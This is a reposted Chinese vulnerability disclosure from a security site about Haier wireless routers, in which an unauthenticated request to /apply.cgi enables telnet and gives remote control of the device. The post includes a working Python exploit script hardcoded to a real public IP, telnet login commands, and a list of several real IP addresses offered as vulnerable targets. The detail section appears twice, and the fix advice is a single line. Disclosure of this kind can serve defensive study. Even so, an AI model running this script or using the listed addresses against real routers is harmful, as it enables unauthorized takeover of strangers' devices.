神刀安全网

漏洞标题: WIFI安全之海尔无线路由器存在高危漏洞可直接控制设备

漏洞详情

披露状态:

2016-04-27: 细节已通知厂商并且等待厂商处理中
2016-04-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

WIFI安全之海尔无线路由器存在高危漏洞可直接控制设备

详细说明:

该无线路由被大量使用,可通过该网站搜索:

https://www.oshadan.com/main,关键字:Haier Wifi,可搜索到5000+

漏洞标题:  WIFI安全之海尔无线路由器存在高危漏洞可直接控制设备

经测试发现,该路由的/st_device.asp 文件有这样一个功能,如图:

漏洞标题:  WIFI安全之海尔无线路由器存在高危漏洞可直接控制设备

”启用 telnet远程管理“,打开这一选项,是不是就可以telnet了呢,试试

选择该项,点击确定,然后执行:telnet xxx.xxx.xxx.xxx 23

奇迹出现了,可直接登录设备,执行一系列的命令。

便于测试,我简单写了一个python脚本,开通该功能:

code 区域
import sys
import requests

#url = sys.argv[1]
url = 'http://124.152.236.162'
if 'http' not in url: os._exit()
url = "{}/apply.cgi".format(url)
data = "igmp_enable=0&upnp_enable=1&syslogd_enable=1&telnetd_enable=1&reboot_enable=0&submit_button=st_device&change_action=&action=Apply&upnpEn=on&remote_management=0&rtelnetd=0&syslogd=0&reboot_start_hour=0&reboot_start_min=0"
print '[*] Opening telnet ..'
req = requests.post(url, data=data)
if req.status_code == 200:
print '[*] Success ..'

直接运行该脚本,即可开通telnet远程控制的功能。

随机选择一些案例来进行漏洞证明:

0x1 http://124.152.236.162

telnet 124.152.236.162 23

漏洞标题:  WIFI安全之海尔无线路由器存在高危漏洞可直接控制设备

0x2 http://124.152.236.186

telnet 124.152.236.186 23

漏洞标题:  WIFI安全之海尔无线路由器存在高危漏洞可直接控制设备

0x3 http://49.117.1.98/

telnet 49.117.1.98 23

漏洞标题:  WIFI安全之海尔无线路由器存在高危漏洞可直接控制设备

再给出一些案例:

code 区域
http://49.117.1.98/
http://124.152.236.186
http://124.152.236.162
http://72.130.248.15/
http://77.35.7.104/

漏洞证明:

该无线路由被大量使用,可通过该网站搜索:

https://www.oshadan.com/main,关键字:Haier Wifi,可搜索到5000+

漏洞标题:  WIFI安全之海尔无线路由器存在高危漏洞可直接控制设备

经测试发现,该路由的/st_device.asp 文件有这样一个功能,如图:

漏洞标题:  WIFI安全之海尔无线路由器存在高危漏洞可直接控制设备

”启用 telnet远程管理“,打开这一选项,是不是就可以telnet了呢,试试

选择该项,点击确定,然后执行:telnet xxx.xxx.xxx.xxx 23

奇迹出现了,可直接登录设备,执行一系列的命令。

便于测试,我简单写了一个python脚本,开通该功能:

code 区域
import sys
import requests

#url = sys.argv[1]
url = 'http://124.152.236.162'
if 'http' not in url: os._exit()
url = "{}/apply.cgi".format(url)
data = "igmp_enable=0&upnp_enable=1&syslogd_enable=1&telnetd_enable=1&reboot_enable=0&submit_button=st_device&change_action=&action=Apply&upnpEn=on&remote_management=0&rtelnetd=0&syslogd=0&reboot_start_hour=0&reboot_start_min=0"
print '[*] Opening telnet ..'
req = requests.post(url, data=data)
if req.status_code == 200:
print '[*] Success ..'

直接运行该脚本,即可开通telnet远程控制的功能。

随机选择一些案例来进行漏洞证明:

0x1 http://124.152.236.162

telnet 124.152.236.162 23

漏洞标题:  WIFI安全之海尔无线路由器存在高危漏洞可直接控制设备

0x2 http://124.152.236.186

telnet 124.152.236.186 23

漏洞标题:  WIFI安全之海尔无线路由器存在高危漏洞可直接控制设备

0x3 http://49.117.1.98/

telnet 49.117.1.98 23

漏洞标题:  WIFI安全之海尔无线路由器存在高危漏洞可直接控制设备

修复方案:

加强权限验证

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: WIFI安全之海尔无线路由器存在高危漏洞可直接控制设备

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址